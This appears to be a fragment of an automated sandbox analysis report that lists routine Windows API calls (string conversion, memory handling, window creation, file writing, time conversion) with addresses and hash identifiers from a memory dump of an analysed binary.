                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                Strings
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                • String ID: "
                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                APIs
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                Strings
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                Strings
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID: F^@
                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2605342592-0